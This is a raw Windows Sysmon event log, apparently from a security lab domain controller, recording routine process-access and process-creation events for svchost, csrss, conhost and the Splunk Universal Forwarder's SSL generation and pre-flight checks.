13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8553-5FCF-5800-000000009101}1520C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8553-5FCF-5800-000000009101}1520C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8553-5FCF-5800-000000009101}1520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8552-5FCF-4A00-000000009101}39723652C:\Windows\system32\cmd.exe{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.154{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-8553-5FCF-5600-000000009101}3972C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 